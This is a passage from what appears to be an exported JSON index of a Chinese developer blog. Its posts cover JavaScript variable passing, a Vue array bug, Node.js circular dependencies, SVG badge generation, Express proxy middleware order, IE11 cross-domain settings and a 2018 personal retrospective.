锤子垮了,曾经吹过的牛逼,曾经理想主义终于脱去那又黑又亮的面具 图灵测试(The Turing test)由艾伦·麦席森·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。 进行多次测试后,如果有超过30%的测试者不能确定出被测试者是人还是机器,那么这台机器就通过了测试,并被认为具有人类智能。图灵测试一词来源于计算机科学和密码学的先驱阿兰·麦席森·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,目前我们已远远落后于这个预测。\n最后说一下图灵测试,在AI方面,这个测试无人不知。一个机器如果通过了图灵测试,则说明该机器具有了只能。但是三体的作者大刘曾经说过一句话,给我一种醍醐灌顶的感觉,假如一个机器人有能力通过图灵测试,却假装无法通过,你说这个机器是否具有人工智能。所以大刘的这种说法才更加让人恐惧。机器人能通过图灵测试,只说明这个机器人具有了智能。但是现阶段的智能只不过是条件反射,或者是基于概率计算的结果。后者这种能通话测试,却假装无法通过的智能。这不仅仅是智能,而是机器的城府。\n有智能的机器并不可怕,有城府的机器人才是真正的可怕。\n如果梦中更加幸福快乐,为什么要回到现实 火影的最后,大筒木辉夜使用无限月读将世界上的所有人都带入梦境,每个人的查克拉都被吸取,并作为神树的养料。\n如果真的存在大筒木这样的上帝,那么时间就是查克拉。人类唯一真正拥有过的东西,时间,将作为神树的养料,从每个人身上提取。\n各种具有吸引力的术,其实可以理解为无限月读,让人沉醉于梦幻中。\n如果梦中更加幸福快乐,为什么要回到现实中承受压力与悲哀呢? 
目前我无法回复自己的这个问题,期待2019年我可以得到这个答案。\n工作方面 2019年,我会在做一些后端方面的工作,努力加油吧。\n","permalink":"https://wdd.js.org/posts/2018/01/where-time-you-spend-what-you-will-be/","summary":"2008-2018 十年,往事如昨 2018年已经是昨天,今天是2019的第一天。\n2008年已经是10年前,10年前的傍晚,我走在南京仙林的一个大街上,提着一瓶矿泉水,擦着额头的汗水,仰头看着大屏幕上播放着北京奥运会的开幕式。\n10年前的夏天,我带着一步诺基亚手机功能机,独自一人去了南京。\n坐过绣球公园的石凳,穿过天妃宫的回廊,吹过阅江楼的凉爽的江风,踏着古老斑驳的城墙,在林荫小路的长椅上,我想着10年后我会在哪里?做着什么事情?\n往事如昨,而今将近而立,但是依然觉得自己还是10年的那个独自出去玩的小男孩。\n2018 读了10年都没有读完的书,五味杂陈 2018年,在我做手术前,我觉得自己出了工作的时间外,大多数时间都在看书。2018年这一年看的书,要比2008到2018年这十年间的看的书都要多。这都归功于我对每天的看书都有定量的计划,一旦按照这个计划实行几个月,积累的效果还是非常明显的。\n2018年,手机几乎成为人的四肢之外的第五肢。对大多人来说,上厕所可以不带纸,但是不能不带手机。\n各种APP, 都在极力的吸引用户多花点时间在自己身上 信息流充斥着各种毫无营养,专门吸人眼球的垃圾新闻,但是这种新闻的阅读量还是蛮大的 各种借钱,信用卡,花呗等都像青楼的小姐,妩媚的笑容,说道:官人,进来做一做 共享单车,在今年退潮之后,才发现自己都在裸泳 比特币,挖矿机。不知道谁割了谁的韭菜,总希望有下一个傻子来接盘,最后发现自己可能就是最后一个傻子 AI,人工智能很火,放佛就快要进入终结者那样的世界 锤子垮了,曾经吹过的牛逼,曾经理想主义终于脱去那又黑又亮的面具 图灵测试(The Turing test)由艾伦·麦席森·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。 进行多次测试后,如果有超过30%的测试者不能确定出被测试者是人还是机器,那么这台机器就通过了测试,并被认为具有人类智能。图灵测试一词来源于计算机科学和密码学的先驱阿兰·麦席森·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,目前我们已远远落后于这个预测。\n最后说一下图灵测试,在AI方面,这个测试无人不知。一个机器如果通过了图灵测试,则说明该机器具有了只能。但是三体的作者大刘曾经说过一句话,给我一种醍醐灌顶的感觉,假如一个机器人有能力通过图灵测试,却假装无法通过,你说这个机器是否具有人工智能。所以大刘的这种说法才更加让人恐惧。机器人能通过图灵测试,只说明这个机器人具有了智能。但是现阶段的智能只不过是条件反射,或者是基于概率计算的结果。后者这种能通话测试,却假装无法通过的智能。这不仅仅是智能,而是机器的城府。\n有智能的机器并不可怕,有城府的机器人才是真正的可怕。\n如果梦中更加幸福快乐,为什么要回到现实 火影的最后,大筒木辉夜使用无限月读将世界上的所有人都带入梦境,每个人的查克拉都被吸取,并作为神树的养料。\n如果真的存在大筒木这样的上帝,那么时间就是查克拉。人类唯一真正拥有过的东西,时间,将作为神树的养料,从每个人身上提取。\n各种具有吸引力的术,其实可以理解为无限月读,让人沉醉于梦幻中。\n如果梦中更加幸福快乐,为什么要回到现实中承受压力与悲哀呢? 目前我无法回复自己的这个问题,期待2019年我可以得到这个答案。\n工作方面 2019年,我会在做一些后端方面的工作,努力加油吧。","title":"时间花在哪里,你就会成为什么样的人"},{"content":"1. demo 如果你对下面的代码没有任何疑问就能自信的回答出输出的内容,那么本篇文章就不值得你浪费时间了。\nvar var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; var3[0] = \u0026#39;changed\u0026#39; var3 = \u0026#39;changed\u0026#39; } test(var1, var3) console.log(var1, var2, var3, var4) 2. 
深入理解原始类型 原始类型有5个 Undefinded, Null, Boolean, Number, String\n2.1. 原始类型变量没有属性和方法 // 抬杠, 下面的length属性,toString方法怎么有属性和方法呢? var a = \u0026#39;oooo\u0026#39; a.length a.toString 原始类型中,有三个特殊的引用类型Boolean, Number, String,在操作原始类型时,原始类型变量会转换成对应的基本包装类型变量去操作。参考JavaScript高级程序设计 5.6 基本包装类型。\n2.2. 原始类型值不可变 原始类型的变量的值是不可变的,只能给变量赋予新的值。\n下面给出例子\n// str1 开始的值是aaa var str1 = \u0026#39;aaa\u0026#39; // 首先创建一个能容纳6个字符串的新字符串 // 然后再这个字符串中填充 aaa和bbb // 最后销毁字符串 aaa和bbb // 而不能理解成在str1的值aaa后追加bbb str1 = str1 + \u0026#39;bbb\u0026#39; 其他原始类型的值也是不可变的, 例如数值类型的。\n2.3. 原始类型值是字面量 3. 变量和值有什么区别? 不是每一个值都有地址,但每一个变量有。《Go程序设计语言》 变量没有类型,值有。变量可以用来保存任何类型的值。《You-Dont-Know-JS》 变量都是有内存地址的,变量有用来保存各种类型的值;不同类型的值,占用的空间不同。\nvar a = 1 typeof a // 检测的不是变量a的类型,而是a的值1的类型 4. 变量访问有哪些方式? 变量访问的方式有两种:\n按值访问 按引用访问 在JS中,五种基本类型Undefinded, Null, Boolean, Number, String是按照值访问的。基本类型变量的值就是字面上表示的值。而引用类型的值是指向该对象的指针,而指针可以理解为内存地址。\n可以理解基本类型的变量的值,就是字面上写的数值。而引用类型的值则是一个内存地址。但是这个内存地址,对于程序来说,是透明不可见的。无论是Get还是Set都无法操作这个内存地址。\n下面是个示意表格。\n语句 变量 值 Get 访问类型 var a = 1 a 1 1 按值 var a = [] a 0x00000320 [] 按引用 抬杠 Undefinded, Null, Boolean, Number是基本类型可以理解,因为这些类型的变量所占用的内存空间都是大小固定的。但是string类型的变量,字符串的长短都是不一样的,也就是说,字符串占用的内存空间大小是不固定的,为什么string被列为按值访问呢?\n基本类型和引用类型的本质区别是,当这个变量被分配值时,它需要向操作系统申请内存资源,如果你向操作系统申请的内存空间的大小是固定的,那么就是基本类型,反之,则为引用类型。\n5. 例子的解释 var var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; // a var3[0] = \u0026#39;changed\u0026#39; // b var3 = \u0026#39;changed\u0026#39; // c } test(var1, var3) console.log(var1, var2, var3, var4) 上面的js分为两个调用栈,在\n图1 外层的调用栈。有四个变量v1、v2、v3、v4 图2 调用test是传参,内层的v1、v3会屏蔽外层的v1、v3。内层的v1,v3和外层的v1、v3内存地址是不同的。内层v1和外层v1已经没有任何关系了,但是内层的v3和外层v3仍然指向同一个数组。 图3 内层的v1的值被改变成\u0026rsquo;changed‘, v3[0]的值被改变为\u0026rsquo;changed\u0026rsquo;。 图4 内层v3的值被重写为字符串changed, 彻底断了与外层v3联系。 图5 当test执行完毕,内层的v1和v3将不会存在,ox75和ox76位置的内存空间也会被释放 最终的输出:\n1 true [\u0026#34;changed\u0026#34;, 2, 3] [\u0026#34;changed\u0026#34;, 2, 3] 6. 
如何深入学习JS、Node.js 看完两个stackoverflow上两个按照投票数量的榜单\nJavaScript问题榜单 Node.js问题榜单 如果学习有捷径的话,踩一遍别人踩过的坑,可能就是捷径。\n7. 参考 is-javascript-a-pass-by-reference-or-pass-by-value-language\nIs number in JavaScript immutable? duplicate\nImmutability in JavaScript\nthe-secret-life-of-javascript-primitives\nJavaScript data types and data structuresLanguages Edit Advanced\nUnderstanding Javascript immutable variable\nExplaining Value vs. Reference in Javascript\nYou-Dont-Know-JS\n《JavaScript高级程序设计(第3版)》[美] 尼古拉斯·泽卡斯\n","permalink":"https://wdd.js.org/posts/2018/12/deep-in-javascript-variable-value-arguments/","summary":"1. demo 如果你对下面的代码没有任何疑问就能自信的回答出输出的内容,那么本篇文章就不值得你浪费时间了。\nvar var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; var3[0] = \u0026#39;changed\u0026#39; var3 = \u0026#39;changed\u0026#39; } test(var1, var3) console.log(var1, var2, var3, var4) 2. 深入理解原始类型 原始类型有5个 Undefinded, Null, Boolean, Number, String\n2.1. 原始类型变量没有属性和方法 // 抬杠, 下面的length属性,toString方法怎么有属性和方法呢? var a = \u0026#39;oooo\u0026#39; a.length a.toString 原始类型中,有三个特殊的引用类型Boolean, Number, String,在操作原始类型时,原始类型变量会转换成对应的基本包装类型变量去操作。参考JavaScript高级程序设计 5.6 基本包装类型。\n2.2. 原始类型值不可变 原始类型的变量的值是不可变的,只能给变量赋予新的值。\n下面给出例子\n// str1 开始的值是aaa var str1 = \u0026#39;aaa\u0026#39; // 首先创建一个能容纳6个字符串的新字符串 // 然后再这个字符串中填充 aaa和bbb // 最后销毁字符串 aaa和bbb // 而不能理解成在str1的值aaa后追加bbb str1 = str1 + \u0026#39;bbb\u0026#39; 其他原始类型的值也是不可变的, 例如数值类型的。","title":"深入理解 JavaScript中的变量、值、函数传参"},{"content":"当函数执行到this.agents.splice()时,我设置了断点。发现传参index是0,但是页面上的列表项对应的第一行数据没有被删除,\nWTF!!! 
这是什么鬼!然后我打开Vue Devtools, 然后刷新了一下,发现那个数组的第一项还是存在的。什么鬼??\nremoveOneAgentByIndex: function (index) { this.agents.splice(index, 1) } 然后我就谷歌了一下,发现这个splice not working properly my object list VueJs, 大概意思是v-for的时候最好给列表项绑定:key=。然后我试了这个方法,发现没啥作用。\n最终我决定,单步调试,如果我发现该问题出在Vue自身,那我就该抛弃Vue, 学习React了\n单步调试中出现一个异常的情况,removeOneAgentByIndex是被A函数调用的,A函数由websocket事件驱动。正常情况下应该触发一次的事件,服务端却发送了两次到客户端。由于事件重复,第一次执行A删除时,实际上removeOneAgentByIndex是执行成功了,但是重复的第二个事件到来时,A函数又往agents数组中添加了一项。导致看起来,removeOneAgentByIndex函数执行起来似乎没有什么作用。而且这两个重复的事件几乎是在同一时间发送到客户端,所以我几乎花了将近一个小时去解决这个bug。引起这个bug的原因是事件重复,所以我在前端代码中加入事件去重功能,最终解决这个问题。\n我记得之前看过一篇文章,一个开发者通过回调函数计费,回调函数是由事件触发,但是没想到有时候事件会重发,导致重复计费。后来这名开发者在自己的代码中加入事件去重的功能,最终解决了这个问题。\n事后总结:我觉得我不该怀疑Vue这种库出现了问题,但是我又不禁去怀疑。\n通过这个bug, 我也学到了第二种方法,可以删除Vue数组中的某一项,参考下面代码。\n// Only in 2.2.0+: Also works with Array + index. removeOneAgentByIndex: function (index) { this.$delete(this.agents, index) } 另外Vue devtools有时候并不会实时的观测到组件属性的变化,即使点了Refresh按钮。如果点了Refresh按钮还不行,那建议你重新打开谷歌浏览器的devtools面板。\n","permalink":"https://wdd.js.org/posts/2018/12/vue-array-splice-not-work/","summary":"当函数执行到this.agents.splice()时,我设置了断点。发现传参index是0,但是页面上的列表项对应的第一行数据没有被删除,\nWTF!!! 这是什么鬼!然后我打开Vue Devtools, 然后刷新了一下,发现那个数组的第一项还是存在的。什么鬼??\nremoveOneAgentByIndex: function (index) { this.agents.splice(index, 1) } 然后我就谷歌了一下,发现这个splice not working properly my object list VueJs, 大概意思是v-for的时候最好给列表项绑定:key=。然后我试了这个方法,发现没啥作用。\n最终我决定,单步调试,如果我发现该问题出在Vue自身,那我就该抛弃Vue, 学习React了\n单步调试中出现一个异常的情况,removeOneAgentByIndex是被A函数调用的,A函数由websocket事件驱动。正常情况下应该触发一次的事件,服务端却发送了两次到客户端。由于事件重复,第一次执行A删除时,实际上removeOneAgentByIndex是执行成功了,但是重复的第二个事件到来时,A函数又往agents数组中添加了一项。导致看起来,removeOneAgentByIndex函数执行起来似乎没有什么作用。而且这两个重复的事件几乎是在同一时间发送到客户端,所以我几乎花了将近一个小时去解决这个bug。引起这个bug的原因是事件重复,所以我在前端代码中加入事件去重功能,最终解决这个问题。\n我记得之前看过一篇文章,一个开发者通过回调函数计费,回调函数是由事件触发,但是没想到有时候事件会重发,导致重复计费。后来这名开发者在自己的代码中加入事件去重的功能,最终解决了这个问题。\n事后总结:我觉得我不该怀疑Vue这种库出现了问题,但是我又不禁去怀疑。\n通过这个bug, 我也学到了第二种方法,可以删除Vue数组中的某一项,参考下面代码。\n// Only in 2.2.0+: Also works with Array + index.
removeOneAgentByIndex: function (index) { this.$delete(this.agents, index) } 另外Vue devtools有时候并不会实时的观测到组件属性的变化,即使点了Refresh按钮。如果点了Refresh按钮还不行,那建议你重新打开谷歌浏览器的devtools面板。","title":"WTF!! Vue数组splice方法无法正常工作"},{"content":"本文重点是讲解如何解决循环依赖这个问题。关心这个问题是如何产生的,可以自行谷歌。\n如何重现这个问题 // a.js const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const {sayA} = require(\u0026#39;./a.js\u0026#39;) sayA() function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } 执行下面的代码\n➜ test git:(master) ✗ node a.js /Users/dd/wj-gitlab/tools/test/b.js:3 sayA() ^ TypeError: sayA is not a function at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/b.js:3:1) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.js:497:12) at Function.Module._load (module.js:489:3) at Module.require (module.js:579:17) at require (internal/module.js:11:18) at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/a.js:1:78) at Module._compile (module.js:635:30) sayA is not a function那么sayA是个什么呢,实际上它是 undefined\n遇到这种问题时,你最好能意识到可能是循环依赖的问题,否则找问题可能事倍功半。\n如何找到循环依赖的的文件 上文的示例代码很简单,2个文件,很容易找出循环依赖。如果有十几个文件,手工去找循环依赖的文件,也是非常麻烦的。\n下面推荐一个工具 madge, 它可以可视化的查看文件之间的依赖关系。\n注意下图1,以cli.js为起点,所有的箭头都是向右展开的,这说明没有循环依赖。如果有箭头出现向左逆流,那么就可能是循环依赖的点。\n图2中,出现向左的箭头,说明出现了循环依赖,说明要此处断开循环。\n如何解决循环依赖 方案1: 先导出自身模块 将module.exports放到文件头部,先将自身模块导出,然后再导入其他模块。\n来自:http://maples7.com/2016/08/17/cyclic-dependencies-in-node-and-its-solution/\n// a.js module.exports = { sayA } const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } // b.js module.exports = { sayB } const {sayA} = require(\u0026#39;./a.js\u0026#39;) console.log(typeof sayA) sayA() function sayB () { console.log(\u0026#39;say A\u0026#39;) } 方案2: 间接调用 
通过引入一个event的消息传递,让多个个模块可以间接传递消息,多个模块之间也可以通过发消息相互调用。\n// a.js require(\u0026#39;./b.js\u0026#39;) const bus = require(\u0026#39;./bus.js\u0026#39;) bus.on(\u0026#39;sayA\u0026#39;, sayA) setTimeout(() =\u0026gt; { bus.emit(\u0026#39;sayB\u0026#39;) }, 0) function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const bus = require(\u0026#39;./bus.js\u0026#39;) bus.on(\u0026#39;sayB\u0026#39;, sayB) setTimeout(() =\u0026gt; { bus.emit(\u0026#39;sayA\u0026#39;) }, 0) function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } // bus.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} module.exports = new MyEmitter() 总结 出现循环依赖,往往是代码的结构出现了问题。应当主动去避免循环依赖这种问题,但是遇到这种问题,无法避免时,也要意识到是循环依赖导致的问题,并找方案解决。\n最后给出一个有意思的问题,下面的代码运行node a.js会输出什么?为什么会这样?\n// a.js var moduleB = require(\u0026#39;./b.js\u0026#39;) setInterval(() =\u0026gt; { console.log(\u0026#39;setInterval A\u0026#39;) }, 500) setTimeout(() =\u0026gt; { console.log(\u0026#39;setTimeout moduleA\u0026#39;) moduleB.sayB() }, 2000) function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js var moduleA = require(\u0026#39;./a.js\u0026#39;) setInterval(() =\u0026gt; { console.log(\u0026#39;setInterval B\u0026#39;) }, 500) setTimeout(() =\u0026gt; { console.log(\u0026#39;setTimeout moduleB\u0026#39;) moduleA.sayA() }, 2000) function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } ","permalink":"https://wdd.js.org/posts/2018/10/how-to-fix-circular-dependencies-in-node-js/","summary":"本文重点是讲解如何解决循环依赖这个问题。关心这个问题是如何产生的,可以自行谷歌。\n如何重现这个问题 // a.js const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const {sayA} = require(\u0026#39;./a.js\u0026#39;) sayA() function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } 执行下面的代码\n➜ test 
git:(master) ✗ node a.js /Users/dd/wj-gitlab/tools/test/b.js:3 sayA() ^ TypeError: sayA is not a function at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/b.js:3:1) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.","title":"Node.js 如何找出循环依赖的文件?如何解决循环依赖问题?"},{"content":"shields小徽章介绍 一般开源项目都会有一些小徽章来标识项目的状态信息,并且这些信息是会自动更新的。在shields的官网https://shields.io/#/, 上面有各种各样的小图标,并且有很多自定义的方案。\n起因:如何给私有部署的jenkins制作shields服务? 私有部署的jenkins是用来打包docker镜像的,而我想获取最新的项目打包的jenkins镜像信息。但是私有的jenkins项目信息,公网的shields服务是无法获取其信息的。那么如果搭建一个私有的shields服务呢?\n第一步:如何根据一些信息,制作svg图标 查看shields图标的源码,可以看到这些图标都是svg格式的图标。然后的思路就是,将文字信息转成svg图标。最后我发现这个思路是个死胡同,\n有个npm包叫做,text-to-svg, 似乎可以将文本转成svg, 但是看了文本转svg的效果,果断就放弃了。\n最后回到起点,看了shields官方仓库,发现一个templates目录,豁然开朗。原来svg图标是由svg的模板生成的,每次生成图标只需要将信息添加到模板中,然后就可以渲染出svg字符串了。\n顺着这个思路,发现一个包shields-lightweight\nvar shields = require(\u0026#39;shields-lightweight\u0026#39;); var svgBadge = shields.svg(\u0026#39;subject\u0026#39;, \u0026#39;status\u0026#39;, \u0026#39;red\u0026#39;, \u0026#39;flat\u0026#39;); 这个包的确可以生成和shields一样的小徽章,但是如果徽章中有中文,那么中文就会溢出。因为一个中文字符的宽度要比一个英文字符宽很多。\n所以我就fork了这个项目,重写了图标宽度计算的方式。shields-less\nnpm install shields-less var shieldsLess = require(\u0026#39;shields-less\u0026#39;) var svgBadge = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, style: \u0026#39;square\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, leftColor: \u0026#39;#e64a19\u0026#39;, rightColor: \u0026#39;#448aff\u0026#39;, style: \u0026#39;square\u0026#39; // just two style: square and plat(default) }) 渲染后的效果,查看在线demo: https://wdd.js.org/shields-less/example/\nshields服务开发 
shields服务其实很简单。架构如下,客户端浏览器发送一个请求,向shields服务,shield服务解析请求,并向jenkins服务发送请求,jenkins服务每个项目都有json的http接口,可以获取项目信息的。shields将从jenkins获取的信息封装到svg小图标中,然后将svg小图标发送到客户端。\n最终效果 ","permalink":"https://wdd.js.org/posts/2018/10/how-to-make-shields-badge/","summary":"shields小徽章介绍 一般开源项目都会有一些小徽章来标识项目的状态信息,并且这些信息是会自动更新的。在shields的官网https://shields.io/#/, 上面有各种各样的小图标,并且有很多自定义的方案。\n起因:如何给私有部署的jenkins制作shields服务? 私有部署的jenkins是用来打包docker镜像的,而我想获取最新的项目打包的jenkins镜像信息。但是私有的jenkins项目信息,公网的shields服务是无法获取其信息的。那么如果搭建一个私有的shields服务呢?\n第一步:如何根据一些信息,制作svg图标 查看shields图标的源码,可以看到这些图标都是svg格式的图标。然后的思路就是,将文字信息转成svg图标。最后我发现这个思路是个死胡同,\n有个npm包叫做,text-to-svg, 似乎可以将文本转成svg, 但是看了文本转svg的效果,果断就放弃了。\n最后回到起点,看了shields官方仓库,发现一个templates目录,豁然开朗。原来svg图标是由svg的模板生成的,每次生成图标只需要将信息添加到模板中,然后就可以渲染出svg字符串了。\n顺着这个思路,发现一个包shields-lightweight\nvar shields = require(\u0026#39;shields-lightweight\u0026#39;); var svgBadge = shields.svg(\u0026#39;subject\u0026#39;, \u0026#39;status\u0026#39;, \u0026#39;red\u0026#39;, \u0026#39;flat\u0026#39;); 这个包的确可以生成和shields一样的小徽章,但是如果徽章中有中文,那么中文就会溢出。因为一个中文字符的宽度要比一个英文字符宽很多。\n所以我就fork了这个项目,重写了图标宽度计算的方式。shields-less\nnpm install shields-less var shieldsLess = require(\u0026#39;shields-less\u0026#39;) var svgBadge = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, style: \u0026#39;square\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, leftColor: \u0026#39;#e64a19\u0026#39;, rightColor: \u0026#39;#448aff\u0026#39;, style: \u0026#39;square\u0026#39; // just two style: square and plat(default) }) 渲染后的效果,查看在线demo: https://wdd.","title":"shields小徽章是如何生成的?以及搭建自己的shield服务器"},{"content":"前后端分离应用的架构 在前后端分离架构中,为了避免跨域以及暴露内部服务地址。一般来说,我会在Express这层中加入一个反向代理。\n所有向后端服务访问的请求,都通过代理转发到内部的各个服务。\n这个反向代理服务器,做起来很简单。用http-proxy-middleware这个模块,几行代码就可以搞定。\n// app.js 
Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) http-proxy-middleware实际上是对于node-http-proxy的更加简便的封装。node-http-proxy是http-proxy-middleware的底层包,如果node-http-proxy有问题,那么这个问题就会影响到http-proxy-middleware这个包。\n最近的bug http-proxy-middleware最近有个问题,请求体在被代理转发前,如果请求体被解析了。那么后端服务将会收不到请求结束的消息,从浏览器的网络面板可以看出,一个请求一直在pending状态。\nCannot proxy after parsing body #299, 实际上这个问题在node-http-proxy也被提出过,而且处于open状态。POST fails/hangs examples to restream also not working #1279\n目前这个bug还是处于open状态,但是还是有解决方案的。就是将请求体解析的中间件挂载在代理之后。\n下面的代码,express.json()会对json格式的请求体进行解析。方案1在代理前就进行body解析,所有格式是json的请求体都会被解析。\n但是有些走代理的请求,如果我们并不关心请求体的内容是什么,实际上我们可以不解析那些走代理的请求。所以,可以先挂载代理中间件,然后挂载请求体解析中间件,最后挂载内部的一些接口服务。\n// 方案1 bad app.use(express.json()) Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) // 方案2 good Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(express.json()) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) 总结 经过这个问题,我对Express中间件的挂载顺序有了更加深刻的认识。\n同时,在使用第三方包的过程中,如果该包bug,那么也需要自行找出合适的解决方案。而这个能力,往往就是高手与新手的区别。\n","permalink":"https://wdd.js.org/posts/2018/09/express-middleware-order-proxy-problem/","summary":"前后端分离应用的架构 在前后端分离架构中,为了避免跨域以及暴露内部服务地址。一般来说,我会在Express这层中加入一个反向代理。\n所有向后端服务访问的请求,都通过代理转发到内部的各个服务。\n这个反向代理服务器,做起来很简单。用http-proxy-middleware这个模块,几行代码就可以搞定。\n// app.js Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) http-proxy-middleware实际上是对于node-http-proxy的更加简便的封装。node-http-proxy是http-proxy-middleware的底层包,如果node-http-proxy有问题,那么这个问题就会影响到http-proxy-middleware这个包。\n最近的bug http-proxy-middleware最近有个问题,请求体在被代理转发前,如果请求体被解析了。那么后端服务将会收不到请求结束的消息,从浏览器的网络面板可以看出,一个请求一直在pending状态。\nCannot proxy after parsing body #299, 实际上这个问题在node-http-proxy也被提出过,而且处于open状态。POST fails/hangs examples to 
restream also not working #1279\n目前这个bug还是处于open状态,但是还是有解决方案的。就是将请求体解析的中间件挂载在代理之后。\n下面的代码,express.json()会对json格式的请求体进行解析。方案1在代理前就进行body解析,所有格式是json的请求体都会被解析。\n但是有些走代理的请求,如果我们并不关心请求体的内容是什么,实际上我们可以不解析那些走代理的请求。所以,可以先挂载代理中间件,然后挂载请求体解析中间件,最后挂载内部的一些接口服务。\n// 方案1 bad app.use(express.json()) Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) // 方案2 good Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(express.json()) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) 总结 经过这个问题,我对Express中间件的挂载顺序有了更加深刻的认识。\n同时,在使用第三方包的过程中,如果该包bug,那么也需要自行找出合适的解决方案。而这个能力,往往就是高手与新手的区别。","title":"Express代理中间件问题与解决方案"},{"content":"IE11有安全设置中有两个选项,\n跨域浏览窗口和框架 通过域访问数据源 如果上面两个选项被禁用,那么IE11会拒绝跨域请求。如果想要跨域成功,必须将上面两个选项设置为启用。\n第一步 打开IE11 点击浏览器右上角的齿轮图标 点击弹框上的 Internet选项 第二步 点击安全 点击Internet 点击自定义级别 第三步 找到跨域浏览窗口和框架\n如果这项是禁用的,那么要勾选启用。\n找到通过域访问数据源\n如果这项是禁用的,那么要勾选启用。\n最后在点击确定。\n最后,如果跨域浏览窗口和框架,通过域访问数据源都启用了,还是无法跨域。那么最好重启一下电脑。有些设置可能在重启后才会生效。\n","permalink":"https://wdd.js.org/posts/2018/08/ie-cross-domain-settings/","summary":"IE11有安全设置中有两个选项,\n跨域浏览窗口和框架 通过域访问数据源 如果上面两个选项被禁用,那么IE11会拒绝跨域请求。如果想要跨域成功,必须将上面两个选项设置为启用。\n第一步 打开IE11 点击浏览器右上角的齿轮图标 点击弹框上的 Internet选项 第二步 点击安全 点击Internet 点击自定义级别 第三步 找到跨域浏览窗口和框架\n如果这项是禁用的,那么要勾选启用。\n找到通过域访问数据源\n如果这项是禁用的,那么要勾选启用。\n最后在点击确定。\n最后,如果跨域浏览窗口和框架,通过域访问数据源都启用了,还是无法跨域。那么最好重启一下电脑。有些设置可能在重启后才会生效。","title":"IE11跨域检查跨域设置"},{"content":" 大三那年的暑假 大三那年暑假,很多同学都回去了,寝室大楼空空如也。\n留在上海的同学都在各自找着兼职的工作,为了不显得无聊,我也在网上随便发了一些简历,试试看运气。\n写简历最难写的部分就是写你自己的长处是什么?搜索枯肠,觉得自己似乎也没什特长。感觉大学三年学到一些东西,又感觉什么都没学到。\n如果没有特长,总该也有点理想吧,比如想干点什么? 
